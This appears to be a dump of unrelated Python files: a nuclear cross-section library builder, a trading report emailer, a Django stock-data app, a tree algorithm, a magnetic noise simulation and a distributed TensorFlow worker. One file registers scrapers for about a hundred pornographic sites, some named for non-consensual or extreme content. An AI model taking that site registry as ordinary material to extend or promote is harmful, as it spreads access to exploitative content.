indarray[i, 0]= indices[i][0][0];indarray[i, 1]= indices[i][1][0]
wgtarray[i, 0]= indices[i][0][1];wgtarray[i, 1]= indices[i][1][1]
nuclind = np.zeros((len(namenuclide), len(tempdata)), dtype=np.int)
for i, n in enumerate(namenuclide):
for j, tt in enumerate(tempdata):
if (n in libgroup[tt].keys()):
nuclind[i][j] = i + 1
t1 = time.time()
for i in range(nsize):
for ind in range(len(namenuclide)):
for j in [0, 1]:
if (nuclind[ind][indarray[i, j]] > 0):
stot[i, :] += libgroup[tempdata[indarray[i, j]]][namenuclide[ind]].stot * values[i, ind] * wgtarray[i, j]
sabs[i, :] += libgroup[tempdata[indarray[i, j]]][namenuclide[ind]].sabs * values[i, ind] * wgtarray[i, j]
scapt[i, :] += libgroup[tempdata[indarray[i, j]]][namenuclide[ind]].scapt * values[i, ind] * wgtarray[i, j]
sf[i, :] += libgroup[tempdata[indarray[i, j]]][namenuclide[ind]].sf * values[i, ind] * wgtarray[i, j]
nusf[i, :] += libgroup[tempdata[indarray[i, j]]][namenuclide[ind]].nusf * values[i, ind] * wgtarray[i, j]
scatter[i, :, :] += libgroup[tempdata[indarray[i, j]]][namenuclide[ind]].xsmatrix * values[i, ind] * wgtarray[i, j]
concentration = 0.0
if (namenuclide[ind] in libgroup[tempdata[0]].keys()):
if (libgroup[tempdata[0]][namenuclide[ind]].sf.sum() > 0):
concentration += values[i, ind]
chi[i, :] += libgroup[tempdata[0]][namenuclide[ind]].schi * values[i, ind]
for i, name in enumerate(conc.keys()):
openmclib[name]._total[0]=stot[i, :]
openmclib[name]._absorption[0]=sabs[i, :]
openmclib[name]._scatter_matrix[0]=scatter[i, :, :]
openmclib[name]._fission[0]=sf[i, :]
if (sum(sf[i, :]) > 0):
openmclib[name]._fissionable = True
openmclib[name]._nu_fission[0]=nusf[i, :]
openmclib[name]._chi[0]=chi[i, :]
return openmclib
#
def prepare_temperature_depended_mg(libgroup, conc, namenuclide, temperature):
"""
Prepare multigroup data for calculation based with temperature dependent
constant
Paramertres:
-----------
libgroup : dictionary
{temperature : dictonary { name of nuclide : element groupsection class }};
:param conc: dict
- dictionary with name of material : np.array - R*8 concentration of nuclide;
:param namenuclide:
- a list of nuclide names;
:param temperature:
- dictionary with name of material : temperature value;
:return:
- dictionary with name of material : openmc.MGXS class element
"""
# TEMPERATURE DEPENDET CASE
openmclib = {}
for name, val in conc.items():
openmclib[name] = openmc.XSdata(name, groups, temperatures=tempdata)
openmclib[name].order = 1
for tt in tempdata:
stot = np.zeros(len(ENERGIES) - 1, dtype=np.double)
sabs = np.zeros(len(ENERGIES) - 1, dtype=np.double)
scapt = np.zeros(len(ENERGIES) - 1, dtype=np.double)
sf = np.zeros(len(ENERGIES) - 1, dtype=np.double)
nusf = np.zeros(len(ENERGIES) - 1, dtype=np.double)
chi = np.zeros(len(ENERGIES) - 1, dtype=np.double)
scatter = np.zeros((len(ENERGIES) - 1, len(ENERGIES) - 1, 2), dtype=np.double)
concentration = 0.0
for n, v in zip(namenuclide, val):
stot += libgroup[tt][n].stot * v
sabs += libgroup[tt][n].sabs * v
scapt += libgroup[tt][n].scapt * v
sf += libgroup[tt][n].sf * v
nusf += libgroup[tt][n].nusf * v
scatter += libgroup[tt][n].xsmatrix * v
if (libgroup[tt][n].sf.sum() > 0):
concentration += v
chi += libgroup[tt][n].schi * v
if (concentration > 0):
chi = chi / concentration
openmclib[name].set_total(stot, temperature=tt)
openmclib[name].set_absorption(sabs, temperature=tt)
openmclib[name].set_scatter_matrix(scatter, temperature=tt)
openmclib[name].set_fission(sf, temperature=tt)
openmclib[name].set_nu_fission(nusf, temperature=tt)
openmclib[name].set_chi(chi, temperature=tt)
return openmclib
def make_libgroup_micro(nameoflib):
libgroup = temp_libgroup(tempdata)
openmclib = {}
for tt in tempdata:
for n in libgroup[tt]:
scatter = np.zeros((len(ENERGIES) - 1, len(ENERGIES) - 1, 2), dtype=np.double)
if (n in openmclib):
openmclib[n].set_total(libgroup[tt][n].stot, temperature=tt)
openmclib[n].set_absorption(libgroup[tt][n].sabs, temperature=tt)
scatter += libgroup[tt][n].xsmatrix*1.0
openmclib[n].set_scatter_matrix(scatter, temperature=tt)
openmclib[n].set_fission(libgroup[tt][n].sf, temperature=tt)
openmclib[n].set_nu_fission(libgroup[tt][n].nusf, temperature=tt)
openmclib[n].set_chi(libgroup[tt][n].schi, temperature=tt)
else:
openmclib[n] = openmc.XSdata(n, groups, temperatures=tempdata)
if (libgroup[tt][n].xsmatrix.shape[-1] < 2):
openmclib[n].order = 0
else:
openmclib[n].order = 1
openmclib[n].order = 1
openmclib[n].set_total(libgroup[tt][n].stot, temperature=tt)
openmclib[n].set_absorption(libgroup[tt][n].sabs, temperature=tt)
scatter += libgroup[tt][n].xsmatrix*1.0
openmclib[n].set_scatter_matrix(scatter, temperature=tt)
openmclib[n].set_fission(libgroup[tt][n].sf, temperature=tt)
openmclib[n].set_nu_fission(libgroup[tt][n].nusf, temperature=tt)
openmclib[n].set_chi(libgroup[tt][n].schi, temperature=tt)
mg_cross_sections_file = openmc.MGXSLibrary(groups)
mg_cross_sections_file.add_xsdatas([openmclib[o] for o in openmclib])
mg_cross_sections_file.export_to_hdf5(nameoflib)
def make_libgroup_macro(nameoflib):
res,resl, dicel, el, rodel, dolna = make_model()
libgroup = temp_libgroup(tempdata)
nuclval = len(resl)
indexNa = el.index("Na")
for key, value in dicel.items():
value[indexNa] = densna(600.0) * 0.6022 / 23 * dolna[key[0]][key[1]]
for key, value in rodel.items():
value[indexNa] = densna(600.0) * 0.6022 / 23 * dolna[key[0]][key[1]]
nuclist, element_from, element_ind, element_val = get_unite_list(resl, el)
concentration = np.zeros(len(nuclist))
conc = {}
temp = {}
for key,value in res.items():
t0 = time.time()
concentration[:nuclval] = value
for f, i, v in zip(element_from, element_ind, element_val):
concentration[i] += dicel[key][f] * v
key_1 = ''+str(key)+''
conc[key_1] = concentration
temp[key_1] = 600.0 # for all zones a temperature the same : 600.0
concentration = 0.0*concentration[:]
print("Estimated time is {} min".format((time.time() - t0)))
rodnuclist, element_from, element_ind, element_val = get_unite_list([], el)
concentration = np.zeros(len(rodnuclist))
concrod = {}
temprod = {}
for key,value in rodel.items():
t0 = time.time()
for f, i, v in zip(element_from, element_ind, element_val):
concentration[i] += rodel[key][f] * v
key_1 = ''+str(key)+''
concrod[key_1] = concentration
temprod[key_1] = 600.0 # for all zones a temperature the same : 600.0
concentration = 0.0*concentration[:]
print("Estimated time is {} min".format((time.time() - t0)))
openmclib = prepare_mg(libgroup, conc, resl, tempdata,
groups, temp)
openmclib.update(prepare_mg(libgroup, concrod, rodnuclist, tempdata,
groups, temprod))
mg_cross_sections_file = openmc.MGXSLibrary(groups)
mg_cross_sections_file.add_xsdatas([openmclib[o] for o in openmclib])
mg_cross_sections_file.export_to_hdf5(nameoflib)
|
#!/usr/bin/python3
import argparse
from jinja2 import Environment, FileSystemLoader
import datetime
import db.mongodb as md
import re
from utils.email_obj import EmailObj
from setup import *
db_name = trade_db_name
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Daily Report')
parser.add_argument('-i', help='Instance')
parser.add_argument('-d', help='Included Days')
parser.add_argument('-f', help='Log file name')
parser.add_argument('-r', help='Receiver Email Address')
args = parser.parse_args()
# print(args)
if not (args.i and args.d and args.r and args.f):
parser.print_help()
exit(1)
instance_id = args.i
days = args.d
email_addr = args.r
file_name = args.f
template_dir = location('monitor/template')
print(template_dir)
subject = 'Quant Daily Report - ' + instance_id
'''
process = os.popen('ps aux | grep %s | grep instance_id | grep -v grep' % instance_id).read()
ret = re.search('python', process)
if ret is None:
process_info = 'Error: Instance (%s) is dead. Please check it ASAP' % instance_id
else:
process_info = process[ret.span()[0]:]
print(process_info)
'''
process_info = ''
with open(file_name, 'r') as f:
off = 1800
f.seek(0, os.SEEK_END)
f.seek(f.tell() - off, os.SEEK_SET)
lines = f.readlines()
for line in lines:
process_info += (line + "<br>")
print(process_info)
db = md.MongoDB(mongo_user, mongo_pwd, db_name, db_url)
collection = 'orders'
begin_time = datetime.datetime.now() - datetime.timedelta(days=int(days))
orders = db.find_sort(collection, {"instance_id": instance_id,
"create_time": {"$gte": int(begin_time.timestamp())}}, 'create_time', -1)
print('orders:', orders)
for order in orders:
del order['_id']
del order['instance_id']
order['create_time'] = datetime.datetime.fromtimestamp(order['create_time']).strftime("%Y-%m-%d %H:%M:%S")
# construct html
env = Environment(
loader=FileSystemLoader(template_dir),
)
template = env.get_template('template.html')
html = template.render(orders=orders, process_info=process_info)
# print(html)
email_obj = EmailObj(email_srv, email_user, email_pwd, email_port)
email_obj.send_mail(subject, html, email_user, to_addr=email_addr)
|
from django.shortcuts import render, redirect, reverse
import pandas as pd
import requests
from .models import Exchange, Company
import time
from project import settings
from django.db import connection
from django.core.management import call_command
API_KEY = settings.FINNHUB_API_KEY
END_POINT = 'https://finnhub.io/api/v1'
def finhub(request):
return render(request, 'finhub/finhub.html')
def exchange(request):
# Initial load from excel file
if Exchange.objects.count() == 0:
df = pd.read_excel('exchanges.xlsx')
Exchange.objects.bulk_create(
Exchange(**vals) for vals in df.to_dict('records')
)
context = {'context':Exchange.objects.all()}
return render(request, 'finhub/exchange.html', context)
def load_companies(request):
"""
Delete all companies in DB and loas them from API; rebuild elasticserach index
"""
#Company.objects.all().delete() - this is too slow, alternative with sql is fast
print('Starting sql for delete')
cursor = connection.cursor()
sql = "TRUNCATE TABLE finhub_company;"
cursor.execute(sql)
print('all companies are deleted')
print('starting update via API calls')
size = len(Exchange.objects.all())
counter = 1
API = '/stock/symbol?exchange='
for exchange_record in Exchange.objects.all():
url = END_POINT + API + exchange_record.code + '&token=' + API_KEY
r = requests.get(url)
df = pd.DataFrame(r.json())
df_records = df.to_dict('records')
model_instances = [Company(
description=record['description'],
displaySymbol=record['displaySymbol'],
symbol=record['symbol'],
exchange = exchange_record,
) for record in df_records]
Company.objects.bulk_create(model_instances)
print('Updated {}. Record {} of {}'.format(exchange_record, counter, size))
time.sleep(1)
counter = counter + 1
print('startig elasticsearch index create')
call_command('search_index', '--rebuild', '-f')
return redirect('exchange')
def exchange_code(request, code):
"""
Executed when visiting finhub/exchange/<str:code>/
If no records in DB about thsi stocke exchange will load data from API,
otherwise will load data from DB and render to template which allows certain
company to be selected -> redirects to company_details/<int:id>/
"""
exchange_record = Exchange.objects.get(code=code)
API = '/stock/symbol?exchange='
url = END_POINT + API + exchange_record.code + '&token=' + API_KEY
r = requests.get(url)
if len(Company.objects.filter(exchange=exchange_record))== 0:
df = pd.DataFrame(r.json())
df_records = df.to_dict('records')
model_instances = [Company(
description=record['description'],
displaySymbol=record['displaySymbol'],
symbol=record['symbol'],
exchange = exchange_record,
) for record in df_records]
Company.objects.bulk_create(model_instances)
stocks = Company.objects.filter(exchange=exchange_record)
context = {'exchange':exchange_record, 'stocks':stocks}
return render(request, 'finhub/exchange_code.html', context)
def exchange_update(request, code):
"""
Executed when visiting url finhub/exchange/<str:code>/update/
Delete all records in DB for certain stock exchange and redirects to finhub/exchange/<str:code>/
"""
exchange_record = Exchange.objects.get(code=code)
Company.objects.filter(exchange=exchange_record).delete()
return redirect('exchange_code', code=code) |
# -*- coding:utf-8 -*-
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution:
def HasSubtree(self, pRoot1, pRoot2):
# write code here
def getseries(root):
if not root:
return ''
return str(root.val)+getseries(root.left)+getseries(root.right)
s1 = getseries(pRoot1)
s2 = getseries(pRoot2)
return s2 in s1 if s2 else False
'''
参考https://github.com/imhuay/Algorithm_Interview_Notes-Chinese/blob/master/C-%E7%AE%97%E6%B3%95/%E4%B8%93%E9%A2%98-A-%E6%95%B0%E6%8D%AE%E7%BB%93%E6%9E%84.md#%E5%88%A4%E6%96%AD%E6%A0%91-b-%E6%98%AF%E5%90%A6%E4%B8%BA%E6%A0%91-a-%E7%9A%84%E5%AD%90%E7%BB%93%E6%9E%84
用递归来写
class Solution {
public:
bool HasSubtree(TreeNode* p1, TreeNode* p2) {
if (p1 == nullptr || p2 == nullptr) // 约定空树不是任意一个树的子结构
return false;
return isSubTree(p1, p2) // 判断子结构是否相同
|| HasSubtree(p1->left, p2) // 递归寻找树 A 中与树 B 根节点相同的子节点
|| HasSubtree(p1->right, p2);
}
bool isSubTree(TreeNode* p1, TreeNode* p2) {
if (p2 == nullptr) return true; // 注意这两个判断的顺序
if (p1 == nullptr) return false;
if (p1->val == p2->val)
return isSubTree(p1->left, p2->left) // 递归判断左右子树
&& isSubTree(p1->right, p2->right);
else
return false;
}
};
''' |
# -*- coding: utf-8 -*-
__author__ = 'Vit'
from common.setting import Setting
from data_format.url import URL
from interface.loader_interface import LoaderInterface
from interface.model_interface import ModelFromControllerInterface, ModelFromSiteInterface
from interface.site_interface import SiteInterface
from interface.view_manager_interface import ViewManagerFromModelInterface
from model.favorites.favorites import Favorites
from model.history_model.hystory import HistoryModel
from model.loader.multiprocess_loader import MultiprocessLoader
from model.site.other.space import Space
from model.site.picture.tgp_sites.babesandbitches import BabesandbitchesSite
from model.site.picture.tgp_sites.bravoerotica import BravoeroticaSite
from model.site.picture.tgp_sites.teenport import TeenportSite
from model.site.picture.tgp_sites.tomorrowporn import TomorrowpornSite
from model.site.picture.tgp_sites.vibraporn import VibrapornSite
from model.site.video.plus_file._nonwork.pornfun import PornfunSite
from model.site.video.plus_file._nonwork.sexix import SexixSite
from model.site.video.plus_file._nonwork.yourporn import YourpornSite
from model.site.video.plus_file.pornmz import PornmzSite
from model.site.video.plus_file.pornvibe import PornvibeSite
from model.site.video.plus_file.pornwild import PornwildSite
from model.site.video.plus_file.redtube import RedtubeSite
from model.site.video.plus_file.yespornpleasexxx import YespornpleasexxxSite
from model.site.video.script._nonwork.beemtube import BeemtubeSite
from model.site.video.script._nonwork.deviantclip import DeviantclipSite
from model.site.video.script._nonwork.motherless import MotherlessSite
from model.site.video.script._nonwork.porn0sex import Porn0sexSite
from model.site.video.script._nonwork.porncom import PornComSite
from model.site.video.script._nonwork.pornhd import PornhdSite
from model.site.video.script._nonwork.pornoxo import PornoxoSite
from model.site.video.script._nonwork.pornsland import PornslandSite
from model.site.video.script._nonwork.porntrex import PorntrexSite
from model.site.video.script._nonwork.rusvideos import RusvideosSite
from model.site.video.script._nonwork.spankwire import SpankwireSite
from model.site.video.script._nonwork.thumbzilla import ThumbzillaSite
from model.site.video.script._nonwork.tube8 import Tube8Site
from model.site.video.script._nonwork.v24videos import V24videoSite
from model.site.video.script._nonwork.youngpornvideos import YoungPornVideosSite
from model.site.video.script.boundhub import BoundhubSite
from model.site.video.script.jizzbunker import JizzbunkerSite
from model.site.video.script.katestube import KatestubeSite
from model.site.video.script.pervclips import PervclipsSite
from model.site.video.script.petardashd import PetardashdSite
from model.site.video.script.pornhub import PornhubSite
from model.site.video.script.pornicom import PornicomSite
from model.site.video.script.pornobomba import PornobombaSite
from model.site.video.script.pornwatchers import PornwatchersSite
from model.site.video.script.pornwhite import PornwhiteSite
from model.site.video.script.realgf import RealGfSite
from model.site.video.script.shockingmovies import ShockingmoviesSite
from model.site.video.script.shooshtime import ShooshtimeSite
from model.site.video.script.sleazyneasy import SleazyneasySite
from model.site.video.script.vikiporn import VikipornSite
from model.site.video.script.xhamster import XhamsterSite
from model.site.video.script.xnxx import XnxxSite
from model.site.video.script.xvideo import XvideoSite
from model.site.video.script.tprn import TprnSite
from model.site.video.script.frprn import FrprnSite
from model.site.video.script.xhand import XhandSite
from model.site.video.script.analdin import AnaldinSite
from model.site.video.script.crockotube import CrockotubeSite
from model.site.video.script.tryboobs import TryboobsSite
from model.site.video.script.xozilla import XozillaSite
from model.site.video.script.tubous import TubousSite
from model.site.video.script.xtits import XtitsSite
from model.site.video.simple.bravotube import BravotubeSite
from model.site.video.simple._nonwork.plusone8 import PlusoneSite
from model.site.video.simple._nonwork.collectionofbestporn import CollectionofbestpornSite
from model.site.video.simple._nonwork.hd_easyporn import HdEasypornSite
from model.site.video.simple._nonwork.heavy_r import HeavyRSite
from model.site.video.simple._nonwork.hotscope import HotscopeSite
from model.site.video.simple._nonwork.pornbozz import PornbozzSite
from model.site.video.simple._nonwork.porngo import PorngoSite
from model.site.video.simple._nonwork.pornone import PornoneSite
from model.site.video.simple._nonwork.tnaflix import TnaflixSite
from model.site.video.simple._nonwork.darknessporn import DarknesspornSite
from model.site.video.simple.dlouha import DlouhaSite
from model.site.video.simple.fapmeifyoucan import FapmeifyoucanSite
from model.site.video.simple.freeuseporn import FreeusepornSite
from model.site.video.simple.gigporno import GigpornoSite
from model.site.video.simple.homeporno import HomepornoSite
from model.site.video.simple.its import ItsSite
from model.site.video.simple.pohub import PohubSite
from model.site.video.simple.pornoakt import PornoaktSite
from model.site.video.simple.pornozot import PornozotSite
from model.site.video.simple.pornxxxvideos import PornxxxvideosSite
from model.site.video.simple.rapelust import RapelustSite
from model.site.video.simple.ruleporn import RulepornSite
from model.site.video.simple.sextube_nl import SextubeNlSite
from model.site.video.simple.sickjunk import SickjunkSite
from model.site.video.simple.spreee import SpreeeSite
from model.site.video.simple.test import TestSite
from model.site.video.simple.xdporner import XdpornerSite
from model.site.video.simple.iporntoo import IporntooSite
from model.site.video.simple.bdsmone import BdsmoneSite
from model.site.video.simple.crocotube import CrocotubeSite
from model.site.video.simple.fapguru import FapguruSite
from model.site.video.simple.freeporn import FreepornSite
from model.site.video.simple.hdporn import HdpornSite
from model.site.video.simple.pornpapa import PornpapaSite
from model.site.video.simple.sex3 import Sex3Site
from model.site.video.simple.sextubefun import SextubefunSite
from model.site.video.simple.stileproject import StileprojectSite
from model.site.video.simple.spicyflix import SpicyflixSite
from model.site.video.simple.xcum import XcumSite
from model.site.video.xhr._nonwork.extremetube import ExtremetubeSite
from model.site.video.xhr._nonwork.pervertslut import PervertslutSite
class Model(ModelFromControllerInterface, ModelFromSiteInterface):
def __init__(self, view_manager:ViewManagerFromModelInterface):
self._view_manager=view_manager
self._loader=MultiprocessLoader()
self._site_models=[
TestSite,
Space('Classic:'),
XozillaSite,XtitsSite,
XhamsterSite,Sex3Site,
AnaldinSite,SextubefunSite,
BravotubeSite,
KatestubeSite,ShockingmoviesSite,HdpornSite,
PornhubSite,TprnSite,CrocotubeSite,XcumSite,
RedtubeSite,PornicomSite,SleazyneasySite,PervclipsSite,VikipornSite,IporntooSite,
XhandSite,ShooshtimeSite,
ItsSite,FapmeifyoucanSite,
DlouhaSite,FrprnSite,
PornwildSite,PornmzSite,PornwhiteSite,CrockotubeSite,
YespornpleasexxxSite,SickjunkSite,
SpreeeSite,XdpornerSite,
PornvibeSite,
XvideoSite,RulepornSite,
GigpornoSite,JizzbunkerSite,
HomepornoSite,PetardashdSite,
SextubeNlSite,
Space('Static:'),
TubousSite,TryboobsSite,SpicyflixSite,StileprojectSite, FapguruSite,FreepornSite,PornpapaSite,PornwatchersSite,XnxxSite,PornxxxvideosSite,
# Space('Amateur:'),
Space('Deviant:'),
BoundhubSite,BdsmoneSite,RapelustSite,FreeusepornSite,
# Space('Short:'),
Space('Photo:'),
BravoeroticaSite,TomorrowpornSite,TeenportSite,VibrapornSite,
BabesandbitchesSite,
Space('Non working:'),
DarknesspornSite,PornobombaSite,RealGfSite,
RusvideosSite, HdEasypornSite,PohubSite,PornozotSite,PornoaktSite,
PlusoneSite,
CollectionofbestpornSite,
PorngoSite,
HotscopeSite,
HeavyRSite,PornslandSite,V24videoSite,YourpornSite,TnaflixSite,SexixSite,
PornhdSite,ThumbzillaSite,SpankwireSite,
PornComSite,PornoxoSite,YoungPornVideosSite,
DeviantclipSite,ExtremetubeSite,PervertslutSite,MotherlessSite,PornfunSite,PornbozzSite,
Tube8Site,BeemtubeSite,PornoneSite,Porn0sexSite,
Space('Blocked'),
PorntrexSite,
]
self._thumb_history=HistoryModel('thumb', self._view_manager.on_thumb_history_changed)
self._full_history=HistoryModel('full', self._view_manager.on_full_history_changed)
self._favorites=Favorites(Setting.global_data_path+'favorites.json')
n=0
for site in self._site_models:
n+=site.number_of_accepted_dimains()
print('No of sites:',n)
def create_sites(self):
for site_class in self._site_models:
site_class.create_start_button(self.view_manager)
def goto_url(self, url: URL, **options):
site=self.can_accept_url(url)
if site:
site(self).goto_url(url, **options)
else:
print('Rejected', url)
def add_to_favorites(self, url: URL, label:str=None):
if label:
self._favorites.add(label,url)
else:
site_class=self.can_accept_url(url)
if site_class:
label=site_class.get_thumb_label(url)
self._favorites.add(label, url)
def remove_favorite(self, url):
print('Removing',url)
self._favorites.remove(url)
self._view_manager.refresh_thumb_view()
def get_favorite_items(self, site: SiteInterface) -> list:
return self._favorites.get_favorite_items(site)
def can_accept_url(self, url: URL):
for site_class in self._site_models:
if site_class.can_accept_url(url):
return site_class
return None
def on_cycle_handler(self):
self._loader.on_update()
def on_exit(self):
self._loader.on_exit()
self._favorites.on_exit()
@property
def view_manager(self) -> ViewManagerFromModelInterface:
return self._view_manager
@property
def loader(self) -> LoaderInterface:
return self._loader
@property
def full_history(self) -> HistoryModel:
return self._full_history
@property
def thumb_history(self) -> HistoryModel:
return self._thumb_history
if __name__ == "__main__":
pass |
import numpy as np
import matplotlib.pyplot as plt
import trimesh
from mayavi import mlab
from bfieldtools.thermal_noise import (
compute_current_modes,
noise_covar,
noise_var,
visualize_current_modes,
)
from bfieldtools.mesh_magnetics import magnetic_field_coupling
import pkg_resources
font = {"family": "normal", "weight": "normal", "size": 16}
plt.rc("font", **font)
# Fix the simulation parameters
d = 1e-3
sigma = 3.8e7
T = 293
kB = 1.38064852e-23
mu0 = 4 * np.pi * 1e-7
freqs = np.array((0,))
Nchunks = 8
quad_degree = 2
mesh = trimesh.load(
pkg_resources.resource_filename("bfieldtools", "example_meshes/closed_cylinder.stl")
)
mesh.vertices, mesh.faces = trimesh.remesh.subdivide(mesh.vertices, mesh.faces)
vl = compute_current_modes(
obj=mesh, T=T, resistivity=1 / sigma, thickness=d, mode="AC", return_eigenvals=False
)
vl[:, 0] = np.zeros(vl[:, 0].shape) # fix DC-component
scene = mlab.figure(None, bgcolor=(1, 1, 1), fgcolor=(0.5, 0.5, 0.5), size=(800, 800))
visualize_current_modes(mesh, vl[:, :, 0], 8, 1)
scene = mlab.figure(None, bgcolor=(1, 1, 1), fgcolor=(0.5, 0.5, 0.5), size=(800, 800))
s = mlab.triangular_mesh(*mesh.vertices.T, mesh.faces)
scene.scene.z_minus_view()
surface = scene.children[0].children[0].children[0].children[0]
surface.actor.property.representation = "wireframe"
surface.actor.mapper.scalar_visibility = False
scene.scene.isometric_view()
scene.scene.render()
Np = 30
x = np.linspace(-0.95, 0.95, Np)
fp = np.array((x, np.zeros(x.shape), np.zeros(x.shape))).T
B_coupling = magnetic_field_coupling(mesh, fp, analytic=True)
B = noise_var(B_coupling, vl)
a = 0.5
L = 2
rat = L / (2 * a)
Gfact = (
1
/ (8 * np.pi)
* (
(3 * rat**5 + 5 * rat**3 + 2) / (rat**2 * (1 + rat**2) ** 2)
+ 3 * np.arctan(rat)
)
)
Ban = np.sqrt(Gfact) * mu0 * np.sqrt(kB * T * sigma * d) / a
plt.figure(figsize=(5, 5))
plt.plot(x, Ban * np.ones(x.shape) * 1e15, label="Analytic", linewidth=2)
plt.plot(
x,
np.sqrt(B[:, 0]) * 1e15,
"x",
label="Numerical",
markersize=10,
markeredgewidth=2,
)
plt.grid()
plt.gca().spines["right"].set_visible(False)
plt.gca().spines["top"].set_visible(False)
plt.legend(frameon=False)
plt.xlabel("z (m)")
plt.ylabel(r"$B_z$ noise at DC (fT/rHz)")
plt.tight_layout()
plt.figure()
plt.semilogy(x, np.sqrt(B[:, 0]), label="x")
plt.semilogy(x, np.sqrt(B[:, 1]), label="y")
plt.semilogy(x, np.sqrt(B[:, 2]), "--", label="z")
plt.legend()
plt.xlabel("z (m)")
plt.ylabel("DC noise (T/rHz)")
|
from multiprocessing import Process, Queue, Event
import tensorflow as tf
from tensorflow import keras
from tensorflow.contrib import training
import numpy as np
from typing import Callable
class DistributedNetworkConfig:
def __init__(self, learning_rate=0.01,
policy_weight=1.0,
training_batch_size=64,
tensorboard_log=False,
log_dir="./logs",
checkpoint_steps=None,
checkpoint_dir=None,
**kwargs):
self.learning_rate = learning_rate
self.policy_weight = policy_weight
self.training_batch_size = training_batch_size
self.tensorboard_log = tensorboard_log
self.log_dir = log_dir
self.checkpoint_steps = checkpoint_steps
self.checkpoint_dir = checkpoint_dir
self.other_args = kwargs
class DistributedNetworkProcess(Process):
def __init__(self, make_network: Callable[[], keras.Model],
session_config: tf.ConfigProto,
task_index: int,
parameter_server: bool,
cluster_spec: tf.train.ClusterSpec,
input_queue: Queue,
ready_event: Event,
output_ready: [Event],
input_buffer: np.ndarray,
index_buffer: np.ndarray,
policy_buffer: np.ndarray,
value_buffer: np.ndarray,
**kwargs):
""" Class for managing a distributed tensorflow model.
This class creates the TF graphs and the distributed server.
Parameters
----------
make_network : () -> keras.Model
Function defining how to construct your network.
session_config : tf.ConfigProto
Tensorflow session config object.
task_index : int
Index of this worker on the cluster spec.
parameter_server : bool
Whether or not this instance is a parameter server.
cluster_spec : tf.train.ClusterSpec
Cluster Spec containing the paths for all workers in the cluster.
input_queue : Queue
This networks input queue.
ready_event : Event
This networks ready event.
output_ready : [Event]
Output events for all connected workers.
input_buffer : np.ndarray
Input buffer for storing worker inputs
index_buffer : np.ndarray
This workers index buffer, this is where it gets prediction requests from.
policy_buffer : np.ndarray
Output buffer.
value_buffer : np.ndarray
Output buffer.
kwargs
Optional arguments that are passed to DistributedNetworkConfig.
"""
super(DistributedNetworkProcess, self).__init__()
self.make_network = make_network
self.session_config = session_config
self.network_config = DistributedNetworkConfig(**kwargs)
self.task_index = task_index
self.cluster_spec = cluster_spec
self.parameter_server = parameter_server
self.input_queue = input_queue
self.ready_event = ready_event
self.output_ready = output_ready
self.input_buffer = input_buffer
self.index_buffer = index_buffer
self.policy_buffer = policy_buffer
self.value_buffer = value_buffer
def _initialize_network(self, training_network: bool = False) -> None:
""" Create Tensorflow graph. """
keras.backend.manual_variable_initialization(True)
device_name = "/job:worker/task:{}".format(self.task_index)
num_ps = self.cluster_spec.num_tasks("ps")
strategy = training.GreedyLoadBalancingStrategy(num_tasks=num_ps, load_fn=training.byte_size_load_fn)
device = tf.train.replica_device_setter(worker_device=device_name, cluster=self.cluster_spec,
ps_strategy=strategy)
with tf.device(device):
self.global_step = tf.train.get_or_create_global_step()
self.training_phase = keras.backend.learning_phase()
with tf.name_scope("Targets"):
num_moves = self.policy_buffer.shape[-1]
self.policy_target = tf.placeholder(tf.float32, shape=(None, num_moves), name="PolicyTargets")
self.value_target = tf.placeholder(tf.float32, shape=(None, 1), name="ValueTargets")
with tf.name_scope("Network"):
self.model = self.make_network()
self.x = self.model.input
self.policy, self.value = self.model.output
if training_network:
with tf.name_scope("Loss"):
with tf.name_scope("ValueLoss"):
value_loss = tf.losses.mean_squared_error(self.value_target, self.value)
self.value_loss = tf.reduce_mean(value_loss)
with tf.name_scope("PolicyLoss"):
policy_loss = tf.nn.softmax_cross_entropy_with_logits_v2(labels=self.policy_target,
logits=self.policy)
self.policy_loss = tf.reduce_mean(policy_loss)
with tf.name_scope("TotalLoss"):
policy_weight = self.network_config.policy_weight
policy_weight = policy_weight / (policy_weight + 1)
value_weight = 1 - policy_weight
self.total_loss = (policy_weight * self.policy_loss) + (value_weight * self.value_loss)
with tf.name_scope("Optimizer"):
self.optimizer = tf.train.AdamOptimizer(learning_rate=self.network_config.learning_rate)
self.train_op = self.optimizer.minimize(self.total_loss, global_step=self.global_step)
self.train_op = tf.group(self.train_op, *self.model.updates)
self.summary_op = tf.no_op()
if self.network_config.tensorboard_log:
with tf.name_scope("Loss"):
tf.summary.scalar('policy_loss', self.policy_loss)
tf.summary.scalar('value_loss', self.value_loss)
tf.summary.scalar('total_loss', self.total_loss)
with tf.name_scope("Debug"):
tf.summary.histogram("value_targets", self.value_target)
for layer in self.model.layers:
with tf.name_scope(layer.name):
for weight in layer.weights:
with tf.name_scope(weight.name.split("/")[-1].split(":")[0]):
tf.summary.histogram('histogram', weight)
self.summary_op = tf.summary.merge_all()
@staticmethod
def _limit_gpu(task_index: int) -> None:
""" Limit the current process to only using one gpu. The gpu is selected in round robin by task index.
Parameters
----------
task_index : int
The index of this worker.
"""
import os
try:
visible_devices = os.environ['CUDA_VISIBLE_DEVICES']
except KeyError:
return
visible_devices = visible_devices.split(',')
num_devices = len(visible_devices)
if num_devices == 1:
return
os.environ['CUDA_VISIBLE_DEVICES'] = visible_devices[task_index % num_devices]
def run(self):
self._limit_gpu(self.task_index)
# Create and start a server for the local task.
job_name = "ps" if self.parameter_server else "worker"
server = tf.train.Server(self.cluster_spec, job_name=job_name, task_index=self.task_index,
config=self.session_config)
# Parameter Server chills here
if self.parameter_server:
server.join()
return
# The workers continue
self._initialize_network()
# Add hooks if necessary
hooks = None
chief_only_hooks = None
# Create a monitored session for communication between network workers.
print(server.target)
with tf.train.MonitoredTrainingSession(master=server.target, is_chief=(self.task_index == 0),
hooks=hooks, chief_only_hooks=chief_only_hooks,
config=self.session_config,
checkpoint_dir=self.network_config.checkpoint_dir,
save_checkpoint_steps=self.network_config.checkpoint_steps,
save_summaries_steps=None, save_summaries_secs=None) as sess:
keras.backend.set_session(sess)
# Store Variables locally for faster access
num_states = self.input_buffer.shape[1]
state_shape = self.input_buffer.shape[2:]
input_queue = self.input_queue
ready_event = self.ready_event
output_ready = self.output_ready
input_buffer = self.input_buffer
index_buffer = self.index_buffer
policy_buffer = self.policy_buffer
value_buffer = self.value_buffer
num_moves = policy_buffer.shape[-1]
policy = self.policy
value = self.value
x = self.x
training_phase = self.training_phase
# Ready to predict
ready_event.set()
